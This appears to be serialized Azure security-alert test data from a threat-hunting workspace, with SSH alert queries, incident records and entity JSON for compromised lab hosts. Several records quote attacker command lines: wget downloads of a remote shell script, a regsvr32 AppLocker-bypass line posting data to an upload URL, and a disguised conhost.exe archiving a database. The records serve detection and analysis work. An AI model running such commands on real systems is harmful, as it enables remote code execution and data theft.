= Host_s\\n| extend IPCustomEntity = IPAddress\",\"timeInterval\":{\"intervalDuration\":1800,\"intervalEnd\":\"2019-02-16T23%3A59%3A02.000Z\"}}},\"detailBlade\":\"SearchBlade\",\"displayValue\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"extension\":\"Microsoft_OperationsManagementSuite_Workspace\",\"kind\":\"OpenBlade\"}", "Search Query Results Overall Count": "4", "Threshold Operator": "Greater Than", "Threshold Value": "0", "Query Interval in Minutes": "30", "Suppression in Minutes": "0", "Total IP Entities": "1", "Total Account Entities": "1", "Total Host Entities": "1" }�X,{ "Alert Mode": "Aggregated", "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/providers/microsoft.operationalinsights/workspaces/asihuntomsworkspacev4\",\"parameters\":{\"q\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"timeInterval\":{\"intervalDuration\":1800,\"intervalEnd\":\"2019-02-16T21%3A54%3A02.000Z\"}}},\"detailBlade\":\"SearchBlade\",\"displayValue\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"extension\":\"Microsoft_OperationsManagementSuite_Workspace\",\"kind\":\"OpenBlade\"}", "Search Query Results Overall Count": "1", "Threshold Operator": "Greater Than", "Threshold Value": "0", "Query Interval in Minutes": "30", "Suppression in Minutes": "0", "Total Account Entities": "1", "Total Host Entities": "1", "Total IP Entities": "1" }�X,{ "Alert Mode": "Aggregated", "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/providers/microsoft.operationalinsights/workspaces/asihuntomsworkspacev4\",\"parameters\":{\"q\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"timeInterval\":{\"intervalDuration\":1800,\"intervalEnd\":\"2019-02-16T21%3A19%3A59.000Z\"}}},\"detailBlade\":\"SearchBlade\",\"displayValue\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"extension\":\"Microsoft_OperationsManagementSuite_Workspace\",\"kind\":\"OpenBlade\"}", "Search Query Results Overall Count": "1", "Threshold Operator": "Greater Than", "Threshold Value": "0", "Query Interval in Minutes": "30", "Suppression in Minutes": "0", "Total Account Entities": "1", "Total IP Entities": "1", "Total Host Entities": "1" }�X�{ "Compromised Host": "MSTICALERTSLXVM2", "User Name": "dbadmin", "Account Session Id": "0x2e8cf", "Suspicious Process": "/usr/bin/wget", "Suspicious Command Line": "wget http://13.67.35.176/QuZYpObins.sh -t 3 -T 5", "Suspicious Process Id": "0x4e55", "resourceType": "Virtual Machine", "ServiceId": "14fa08c7-c48e-4c18-950c-8148024b4398", "ReportingSystem": "Azure", "OccuringDatacenter": "eastus" }�X�{ "Compromised Host": "MSTICALERTSLXVM2", "User Name": "dbadmin", "Account Session Id": "0x2e083", "Suspicious Process": "/usr/bin/wget", "Suspicious Command Line": "wget http://131.107.147.81/QuZYpObins.sh -t 3 -T 5", "Suspicious Process Id": "0x4cd2", "resourceType": "Virtual Machine", "ServiceId": "14fa08c7-c48e-4c18-950c-8148024b4398", "ReportingSystem": "Azure", "OccuringDatacenter": "eastus" }�X�{ "Compromised Host": "MSTICALERTSLXVM2", "User Name": "dbadmin", "Account Session Id": "0x2e093", "Suspicious Process": "/usr/bin/vim.basic", "Suspicious Command Line": "/usr/bin/vim.basic /tmp/crontab.UQ6iiQ/crontab", "Suspicious Process Id": "0x51b3", "resourceType": "Virtual Machine", "ServiceId": "14fa08c7-c48e-4c18-950c-8148024b4398", "ReportingSystem": "Azure", "OccuringDatacenter": "eastus" }�X�{ "isincident": "true", "Detected Time (UTC)": "2019-02-15 10:14:37 UTC", "Incident Stage": "abused resource in", "Compromised Host": "MSTICALERTSLXVM2", "Start Time (UTC)": "2019-02-13 02:50:38 UTC", "crossvm": "false", "resourceType": "Virtual Machine", "ServiceId": "14fa08c7-c48e-4c18-950c-8148024b4398", "ReportingSystem": "Azure", "OccuringDatacenter": "eastus" }�XI{ "Machine Name": "MSTICAlertsWin1", "Command List": "FTP session was established.\nPING command was executed.\nNew user was created.\nAdministrators group members enumeration.\nNew user was added to the Administrators group.\nNew scheduled task was created.", "Account List": "MSTICALERTSWIN1\\ian", "compromised host": "MSTICAlertsWin1", "End Time UTC": "02/15/2019 19:55:11", "ActionTaken": "Detected", "resourceType": "Virtual Machine", "ServiceId": "14fa08c7-c48e-4c18-950c-8148024b4398", "ReportingSystem": "Azure", "OccuringDatacenter": "eastus" }�X�{ "Compromised Host": "MSTICALERTSLXVM2", "User Name": "dbadmin", "Account Session Id": "0x2e61f", "Suspicious Process": "/usr/bin/wget", "Suspicious Command Line": "wget http://131.107.147.81/QuZYpObins.sh -t 3 -T 5", "Suspicious Process Id": "0x28c4", "resourceType": "Virtual Machine", "ServiceId": "14fa08c7-c48e-4c18-950c-8148024b4398", "ReportingSystem": "Azure", "OccuringDatacenter": "eastus" }�X,{ "Alert Mode": "Aggregated", "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/providers/microsoft.operationalinsights/workspaces/asihuntomsworkspacev4\",\"parameters\":{\"q\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"timeInterval\":{\"intervalDuration\":1800,\"intervalEnd\":\"2019-02-16T21%3A34%3A02.000Z\"}}},\"detailBlade\":\"SearchBlade\",\"displayValue\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"extension\":\"Microsoft_OperationsManagementSuite_Workspace\",\"kind\":\"OpenBlade\"}", "Search Query Results Overall Count": "2", "Threshold Operator": "Greater Than", "Threshold Value": "0", "Query Interval in Minutes": "30", "Suppression in Minutes": "0", "Total Account Entities": "1", "Total IP Entities": "1", "Total Host Entities": "1" }�X,{ "Alert Mode": "Aggregated", "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/providers/microsoft.operationalinsights/workspaces/asihuntomsworkspacev4\",\"parameters\":{\"q\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"timeInterval\":{\"intervalDuration\":1800,\"intervalEnd\":\"2019-02-16T21%3A29%3A02.000Z\"}}},\"detailBlade\":\"SearchBlade\",\"displayValue\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"extension\":\"Microsoft_OperationsManagementSuite_Workspace\",\"kind\":\"OpenBlade\"}", "Search Query Results Overall Count": "2", "Threshold Operator": "Greater Than", "Threshold Value": "0", "Query Interval in Minutes": "30", "Suppression in Minutes": "0", "Total Host Entities": "1", "Total Account Entities": "1", "Total IP Entities": "1" }�X,{ "Alert Mode": "Aggregated", "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/providers/microsoft.operationalinsights/workspaces/asihuntomsworkspacev4\",\"parameters\":{\"q\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"timeInterval\":{\"intervalDuration\":1800,\"intervalEnd\":\"2019-02-16T21%3A49%3A02.000Z\"}}},\"detailBlade\":\"SearchBlade\",\"displayValue\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"extension\":\"Microsoft_OperationsManagementSuite_Workspace\",\"kind\":\"OpenBlade\"}", "Search Query Results Overall Count": "1", "Threshold Operator": "Greater Than", "Threshold Value": "0", "Query Interval in Minutes": "30", "Suppression in Minutes": "0", "Total Account Entities": "1", "Total IP Entities": "1", "Total Host Entities": "1" }�X,{ "Alert Mode": "Aggregated", "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/providers/microsoft.operationalinsights/workspaces/asihuntomsworkspacev4\",\"parameters\":{\"q\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"timeInterval\":{\"intervalDuration\":1800,\"intervalEnd\":\"2019-02-16T21%3A24%3A02.000Z\"}}},\"detailBlade\":\"SearchBlade\",\"displayValue\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"extension\":\"Microsoft_OperationsManagementSuite_Workspace\",\"kind\":\"OpenBlade\"}", "Search Query Results Overall Count": "1", "Threshold Operator": "Greater Than", "Threshold Value": "0", "Query Interval in Minutes": "30", "Suppression in Minutes": "0", "Total Account Entities": "1", "Total Host Entities": "1", "Total IP Entities": "1" }�X,{ "Alert Mode": "Aggregated", "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/providers/microsoft.operationalinsights/workspaces/asihuntomsworkspacev4\",\"parameters\":{\"q\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"timeInterval\":{\"intervalDuration\":1800,\"intervalEnd\":\"2019-02-16T21%3A39%3A02.000Z\"}}},\"detailBlade\":\"SearchBlade\",\"displayValue\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"extension\":\"Microsoft_OperationsManagementSuite_Workspace\",\"kind\":\"OpenBlade\"}", "Search Query Results Overall Count": "2", "Threshold Operator": "Greater Than", "Threshold Value": "0", "Query Interval in Minutes": "30", "Suppression in Minutes": "0", "Total Account Entities": "1", "Total IP Entities": "1", "Total Host Entities": "1" }�X,{ "Alert Mode": "Aggregated", "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/providers/microsoft.operationalinsights/workspaces/asihuntomsworkspacev4\",\"parameters\":{\"q\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"timeInterval\":{\"intervalDuration\":1800,\"intervalEnd\":\"2019-02-16T21%3A44%3A02.000Z\"}}},\"detailBlade\":\"SearchBlade\",\"displayValue\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"extension\":\"Microsoft_OperationsManagementSuite_Workspace\",\"kind\":\"OpenBlade\"}", "Search Query Results Overall Count": "2", "Threshold Operator": "Greater Than", "Threshold Value": "0", "Query Interval in Minutes": "30", "Suppression in Minutes": "0", "Total Account Entities": "1", "Total Host Entities": "1", "Total IP Entities": "1" }�X,{ "Alert Mode": "Aggregated", "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/providers/microsoft.operationalinsights/workspaces/asihuntomsworkspacev4\",\"parameters\":{\"q\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"timeInterval\":{\"intervalDuration\":1800,\"intervalEnd\":\"2019-02-16T23%3A49%3A02.000Z\"}}},\"detailBlade\":\"SearchBlade\",\"displayValue\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"extension\":\"Microsoft_OperationsManagementSuite_Workspace\",\"kind\":\"OpenBlade\"}", "Search Query Results Overall Count": "4", "Threshold Operator": "Greater Than", "Threshold Value": "0", "Query Interval in Minutes": "30", "Suppression in Minutes": "0", "Total Host Entities": "1", "Total IP Entities": "1", "Total Account Entities": "1" }�X,{ "Alert Mode": "Aggregated", "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/providers/microsoft.operationalinsights/workspaces/asihuntomsworkspacev4\",\"parameters\":{\"q\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"timeInterval\":{\"intervalDuration\":1800,\"intervalEnd\":\"2019-02-16T23%3A34%3A02.000Z\"}}},\"detailBlade\":\"SearchBlade\",\"displayValue\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"extension\":\"Microsoft_OperationsManagementSuite_Workspace\",\"kind\":\"OpenBlade\"}", "Search Query Results Overall Count": "4", "Threshold Operator": "Greater Than", "Threshold Value": "0", "Query Interval in Minutes": "30", "Suppression in Minutes": "0", "Total Account Entities": "1", "Total Host Entities": "1", "Total IP Entities": "1" }�X,{ "Alert Mode": "Aggregated", "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/providers/microsoft.operationalinsights/workspaces/asihuntomsworkspacev4\",\"parameters\":{\"q\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"timeInterval\":{\"intervalDuration\":1800,\"intervalEnd\":\"2019-02-16T23%3A54%3A02.000Z\"}}},\"detailBlade\":\"SearchBlade\",\"displayValue\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"extension\":\"Microsoft_OperationsManagementSuite_Workspace\",\"kind\":\"OpenBlade\"}", "Search Query Results Overall Count": "4", "Threshold Operator": "Greater Than", "Threshold Value": "0", "Query Interval in Minutes": "30", "Suppression in Minutes": "0", "Total Account Entities": "1", "Total IP Entities": "1", "Total Host Entities": "1" }�X�{ "isincident": "true", "Detected Time (UTC)": "2019-02-14 18:03:23 UTC", "Incident Stage": "abused resource in", "Compromised Host": "MSTICALERTSWIN1", "Start Time (UTC)": "2019-02-14 11:51:38 UTC", "crossvm": "false", "resourceType": "Virtual Machine", "ServiceId": "14fa08c7-c48e-4c18-950c-8148024b4398", "ReportingSystem": "Azure", "OccuringDatacenter": "eastus" }�X\{ "domain name": "MSTICAlertsWin1", "user name": "MSTICALERTSWIN1\\MSTICAdmin", "process name": "c:\\windows\\fonts\\conhost.exe", "command line": "c:\\windows\\fonts\\conhost.exe zip archive.mdb", "parent process": "rundll32.exe", "process id": "0x119c", "account logon id": "0x78225e", "User SID": "S-1-5-21-996632719-2361334927-4038480536-500", "parent process id": "0x12b0", "System Process": "CONHOST.EXE", "resourceType": "Virtual Machine", "ServiceId": "14fa08c7-c48e-4c18-950c-8148024b4398", "ReportingSystem": "Azure", "OccuringDatacenter": "eastus" }�XB{ "Compromised Host": "MSTICALERTSWIN1", "User Name": "MSTICALERTSWIN1\\MSTICAdmin", "Account Session Id": "0x78225e", "Suspicious Process": "c:\\w!ndows\\system32\\regsvr32.exe", "Suspicious Command Line": ".\\regsvr32 /u /s c:\\windows\\fonts\\csrss.exe \"http://www.401k.com/upload?pass=34592389\" post", "Parent Process": "c:\\windows\\system32\\cmd.exe", "Suspicious Process Id": "0x1150", "resourceType": "Virtual Machine", "ServiceId": "14fa08c7-c48e-4c18-950c-8148024b4398", "ReportingSystem": "Azure", "OccuringDatacenter": "eastus" }�X�{ "isincident": "true", "Detected Time (UTC)": "2019-02-14 05:19:13 UTC", "Incident Stage": "attacked other resources from", "Compromised Host": "MSTICALERTSWIN1", "Start Time (UTC)": "2019-02-12 11:48:01 UTC", "crossvm": "false", "resourceType": "Virtual Machine", "ServiceId": "14fa08c7-c48e-4c18-950c-8148024b4398", "ReportingSystem": "Azure", "OccuringDatacenter": "eastus" }�X*{ "Alert Mode": "Aggregated", "Search Query": "{\"detailBladeInputs\":{\"id\":\"/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/providers/microsoft.operationalinsights/workspaces/asihuntomsworkspacev4\",\"parameters\":{\"q\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"timeInterval\":{\"intervalDuration\":300,\"intervalEnd\":\"2019-02-18T16%3A44%3A21.000Z\"}}},\"detailBlade\":\"SearchBlade\",\"displayValue\":\"SSHAlertDataV2_CL\\n| extend AccountCustomEntity = Account_s\\n| extend HostCustomEntity = Host_s\\n| extend IPCustomEntity = IPAddress\",\"extension\":\"Microsoft_OperationsManagementSuite_Workspace\",\"kind\":\"OpenBlade\"}", "Search Query Results Overall Count": "1", "Threshold Operator": "Greater Than", "Threshold Value": "0", "Query Interval in Minutes": "5", "Suppression in Minutes": "0", "Total Account Entities": "1", "Total Host Entities": "1", "Total IP Entities": "1" }�X�{ "Compromised Host": "MSTICALERTSLXVM2", "User Name": "dbadmin", "Account Session Id": "0x2fdcd", "Suspicious Process": "/usr/bin/wget", "Suspicious Command Line": "wget http://23.97.60.214/QuZYpObins.sh -t 3 -T 5", "Suspicious Process Id": "0x61a7", "resourceType": "Virtual Machine", "ServiceId": "14fa08c7-c48e-4c18-950c-8148024b4398", "ReportingSystem": "Azure", "OccuringDatacenter": "eastus" }�X$[ { "$id": "3", "Address": "23.97.60.214", "Type": "ip", "Count": 1 }, { "$id": "4", "HostName": "MSTICAlertsLxVM2", "Type": "host", "Count": 1 }, { "$id": "5", "Name": "dbadmin", "Type": "account", "Count": 1 } ]�X#[ { "$id": "3", "Address": "203.0.113.1", "Type": "ip", "Count": 1 }, { "$id": "4", "HostName": "MSTICAlertsLxVM2", "Type": "host", "Count": 1 }, { "$id": "5", "Name": "dbadmin", "Type": "account", "Count": 1 } ]�j�X�[ { "$id": "3", "Address": "23.97.60.214", "Type": "ip", "Count": 1 }, { "$id": "4", "Address": "203.0.113.1", "Type": "ip", "Count": 1 }, { "$id": "5", "HostName": "MSTICAlertsLxVM2", "Type": "host", "Count": 2 }, { "$id": "6", "Name": "dbadmin", "Type": "account", "Count": 2 } ]�j�j�j�j�j�j�j�X�[ { "$id": "3", "Address": "203.0.113.1", "Type": "ip", "Count": 1 }, { "$id": "4", "Address": "23.97.60.214", "Type": "ip", "Count": 1 }, { "$id": "5", "HostName": "MSTICAlertsLxVM2", "Type": "host", "Count": 2 }, { "$id": "6", "Name": "dbadmin", "Type": "account", "Count": 2 } ]�j�j�j�X#[ { "$id": "3", "Address": "203.0.113.1", "Type": "ip", "Count": 4 }, { "$id": "4", "HostName": "MSTICAlertsLxVM2", "Type": "host", "Count": 4 }, { "$id": "5", "Name": "dbadmin", "Type": "account", "Count": 4 } ]�j�j�X$[ { "$id": "3", "Address": "104.211.30.1", "Type": "ip", "Count": 1 }, { "$id": "4", "HostName": "MSTICAlertsLxVM2", "Type": "host", "Count": 1 }, { "$id": "5", "Name": "dbadmin", "Type": "account", "Count": 1 } ]�j�X[ { "$id": "4", "DnsDomain": "", "NTDomain": "", "HostName": "MSTICALERTSLXVM2", "NetBiosName": "MSTICALERTSLXVM2", "OSFamily": "Linux", "OSVersion": "Linux", "Type": "host" }, { "$id": "5", "ProcessId": "0x4e4f", "CommandLine": "", "Host": { "$ref": "4" }, "Type": "process" }, { "$id": "6", "Name": "dbadmin", "Host": { "$ref": "4" }, "Sid": "1001:1001", "Type": "account", "LogonId": "0x2e8cf" }, { "$id": "7", "Directory": "/usr/bin", "Name": "wget", "Type": "file" }, { "$id": "8", "ProcessId": "0x4e55", "CommandLine": "wget http://13.67.35.176/QuZYpObins.sh -t 3 -T 5", "CreationTimeUtc": "2019-02-16T03:23:54.29Z", "ImageFile": { "$ref": "7" }, "Account": { "$ref": "6" }, "ParentProcess": { "$ref": "5" }, "Host": { "$ref": "4" }, "Type": "process" }, { "$id": "9", "SessionId": "0x2e8cf", "StartTimeUtc": "2019-02-16T03:23:54.29Z", "EndTimeUtc": "2019-02-16T03:23:54.29Z", "Type": "host-logon-session", "Host": { "$ref": "4" }, "Account": { "$ref": "6" } } ]�X[ { "$id": "4", "DnsDomain": "", "NTDomain": "", "HostName": "MSTICALERTSLXVM2", "NetBiosName": "MSTICALERTSLXVM2", "OSFamily": "Linux", "OSVersion": "Linux", "Type": "host" }, { "$id": "5", "ProcessId": "0x4ccc", "CommandLine": "", "Host": { "$ref": "4" }, "Type": "process" }, { "$id": "6", "Name": "dbadmin", "Host": { "$ref": "4" }, "Sid": "1001:1001", "Type": "account", "LogonId": "0x2e083" }, { "$id": "7", "Directory": "/usr/bin", "Name": "wget", "Type": "file" }, { "$id": "8", "ProcessId": "0x4cd2", "CommandLine": "wget http://131.107.147.81/QuZYpObins.sh -t 3 -T 5", "CreationTimeUtc": "2019-02-15T03:50:55.923Z", "ImageFile": { "$ref": "7" }, "Account": { "$ref": "6" }, "ParentProcess": { "$ref": "5" }, "Host": { "$ref": "4" }, "Type": "process" }, { "$id": "9", "SessionId": "0x2e083", "StartTimeUtc": "2019-02-15T03:50:55.923Z", "EndTimeUtc": "2019-02-15T03:50:55.923Z", "Type": "host-logon-session", "Host": { "$ref": "4" }, "Account": { "$ref": "6" } } ]�X[ { "$id": "4", "DnsDomain": "", "NTDomain": "", "HostName": "MSTICALERTSLXVM2", "NetBiosName": "MSTICALERTSLXVM2", "OSFamily": "Linux", "OSVersion": "Linux", "Type": "host" }, { "$id": "5", "ProcessId": "0x518a", "CommandLine": "", "Host": { "$ref": "4" }, "Type": "process" }, { "$id": "6", "Name": "dbadmin", "Host": { "$ref": "4" }, "Sid": "1001:1001", "Type": "account", "LogonId": "0x2e093" }, { "$id": "7", "Directory": "/usr/bin", "Name": "vim.basic", "Type": "file" }, { "$id": "8", "ProcessId": "0x51b3", "CommandLine": "/usr/bin/vim.basic /tmp/crontab.UQ6iiQ/crontab", "CreationTimeUtc": "2019-02-15T04:03:22.173Z", "ImageFile": { "$ref": "7" }, "Account": { "$ref": "6" }, "ParentProcess": { "$ref": "5" }, "Host": { "$ref": "4" }, "Type": "process" }, { "$id": "9", "SessionId": "0x2e093", "StartTimeUtc": "2019-02-15T04:03:22.173Z", "EndTimeUtc": "2019-02-15T04:03:22.173Z", "Type": "host-logon-session", "Host": { "$ref": "4" }, "Account": { "$ref": "6" } } ]�X�[ { "$id": "4", "DisplayName": "Possible suspicious scheduling tasks access detected", "CompromisedEntity": "MSTICALERTSLXVM2", "Count": 2, "Severity": "Informational", "SystemAlertIds": [ "2518522745615999999_c57a0525-9ca0-4caa-aee8-fd1bb33f785b" ], "AlertType": "SCUBA_RULE_AccessCronJob", "VendorName": "Microsoft", "ProviderName": "Detection", "StartTimeUtc": "2019-02-13T02:50:38.4Z", "EndTimeUtc": "2019-02-13T02:50:38.4Z", "Type": "alerts", "Location": "Central US" }, { "$id": "5", "DisplayName": "Detected suspicious file download", "CompromisedEntity": "MSTICALERTSLXVM2", "Count": 2, "Severity": "Low", "SystemAlertIds": [ "2518520981440769999_caab1270-55d3-4447-8618-16cf8672e4e1" ], "AlertType": "SCUBA_RULE_Suspicious_file_download", "VendorName": "Microsoft", "ProviderName": "Detection", "StartTimeUtc": "2019-02-15T03:50:55.923Z", "EndTimeUtc": "2019-02-15T03:50:55.923Z", "Type": "alerts", "Location": "Central US" }, { "$id": "6", "DisplayName": "Possible suspicious scheduling tasks access detected", "CompromisedEntity": "MSTICALERTSLXVM2", "Count": 2, "Severity": "Informational", "SystemAlertIds": [ "2518520973978269999_57b6af71-984e-45f3-9aac-d6bbd79eed07" ], "AlertType": "SCUBA_RULE_AccessCronJob", "VendorName": "Microsoft", "ProviderName": "Detection", "StartTimeUtc": "2019-02-15T04:03:22.173Z", "EndTimeUtc": "2019-02-15T04:03:22.173Z", "Type": "alerts", "Location": "Central US" } ]�X�[ { "$id": "2", "HostName": "msticalertswin1", "AzureID": "/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1", "OMSAgentID": "263a788b-6526-4cdc-8ed9-d79402fe4aa0", "Type": "host" }, { "$id": "3", "Name": "ian", "NTDomain": "msticalertswin1", "Host": { "$ref": "2" }, "IsDomainJoined": false, "Type": "account" } ]�X[ { "$id": "4", "DnsDomain": "", "NTDomain": "", "HostName": "MSTICALERTSLXVM2", "NetBiosName": "MSTICALERTSLXVM2", "OSFamily": "Linux", "OSVersion": "Linux", "Type": "host" }, { "$id": "5", "ProcessId": "0x28be", "CommandLine": "", "Host": { "$ref": "4" }, "Type": "process" }, { "$id": "6", "Name": "dbadmin", "Host": { "$ref": "4" }, "Sid": "1001:1001", "Type": "account", "LogonId": "0x2e61f" }, { "$id": "7", "Directory": "/usr/bin", "Name": "wget", "Type": "file" }, { "$id": "8", "ProcessId": "0x28c4", "CommandLine": "wget http://131.107.147.81/QuZYpObins.sh -t 3 -T 5", "CreationTimeUtc": "2019-02-15T19:43:49.39Z", "ImageFile": { "$ref": "7" }, "Account": { "$ref": "6" }, "ParentProcess": { "$ref": "5" }, "Host": { "$ref": "4" }, "Type": "process" }, { "$id": "9", "SessionId": "0x2e61f", "StartTimeUtc": "2019-02-15T19:43:49.39Z", "EndTimeUtc": "2019-02-15T19:43:49.39Z", "Type": "host-logon-session", "Host": { "$ref": "4" }, "Account": { "$ref": "6" } } ]�X$[ { "$id": "3", "Address": "104.211.30.1", "Type": "ip", "Count": 2 }, { "$id": "4", "HostName": "MSTICAlertsLxVM2", "Type": "host", "Count": 2 }, { "$id": "5", "Name": "dbadmin", "Type": "account", "Count": 2 } ]�j�j�j�j�j�j�j�j�XM[ { "$id": "4", "DisplayName": "Suspicious system process executed", "CompromisedEntity": "MSTICALERTSWIN1", "Count": 2, "Severity": "Medium", "SystemAlertIds": [ "2518521557015111330_65a3fe73-0832-427a-aab3-06edc2c27f0a" ], "AlertType": "SuspiciousSystemProcess", "VendorName": "Microsoft", "ProviderName": "Detection", "StartTimeUtc": "2019-02-14T11:51:38.4888669Z", "EndTimeUtc": "2019-02-14T11:51:38.4888669Z", "Type": "alerts", "Location": "Central US" }, { "$id": "5", "DisplayName": "Potential attempt to bypass AppLocker detected", "CompromisedEntity": "MSTICALERTSWIN1", "Count": 2, "Severity": "High", "SystemAlertIds": [ "2518521557014927413_daa18e53-ab1d-4d7d-8c4f-bcb86f75fd5f" ], "AlertType": "SCUBA_RULE_Applocker_Bypass", "VendorName": "Microsoft", "ProviderName": "Detection", "StartTimeUtc": "2019-02-14T11:51:38.5072586Z", "EndTimeUtc": "2019-02-14T11:51:38.5072586Z", "Type": "alerts", "Location": "Central US" } ]�X�[ { "$id": "4", "DnsDomain": "", "NTDomain": "", "HostName": "MSTICALERTSWIN1", "NetBiosName": "MSTICALERTSWIN1", "OSFamily": "Windows", "OSVersion": "Windows", "IsDomainJoined": false, "Type": "host" }, { "$id": "5", "Directory": "c:\\w!ndows\\system32", "Name": "rundll32.exe", "Type": "file" }, { "$id": "6", "ProcessId": "0x12b0", "CommandLine": "", "ImageFile": { "$ref": "5" }, "Host": { "$ref": "4" }, "Type": "process" }, { "$id": "7", "Name": "MSTICAdmin", "NTDomain": "MSTICAlertsWin1", "Host": { "$ref": "4" }, "Sid": "S-1-5-21-996632719-2361334927-4038480536-500", "IsDomainJoined": false, "Type": "account", "LogonId": "0x78225e" }, { "$id": "8", "Directory": "c:\\windows\\fonts", "Name": "conhost.exe", "Type": "file" }, { "$id": "9", "ProcessId": "0x119c", "CommandLine": "c:\\windows\\fonts\\conhost.exe zip archive.mdb", "ElevationToken": "Default", "CreationTimeUtc": "2019-02-14T11:51:38.4888669Z", "ImageFile": { "$ref": "8" }, "Account": { "$ref": "7" }, "ParentProcess": { "$ref": "6" }, "Host": { "$ref": "4" }, "Type": "process" }, { "$id": "10", "SessionId": "0x78225e", "StartTimeUtc": "2019-02-14T11:51:38.4888669Z", "EndTimeUtc": "2019-02-14T11:51:38.4888669Z", "Type": "host-logon-session", "Host": { "$ref": "4" }, "Account": { "$ref": "7" } } ]�X�[ { "$id": "4", "DnsDomain": "", "NTDomain": "", "HostName": "MSTICALERTSWIN1", "NetBiosName": "MSTICALERTSWIN1", "OSFamily": "Windows", "OSVersion": "Windows", "IsDomainJoined": false, "Type": "host" }, { "$id": 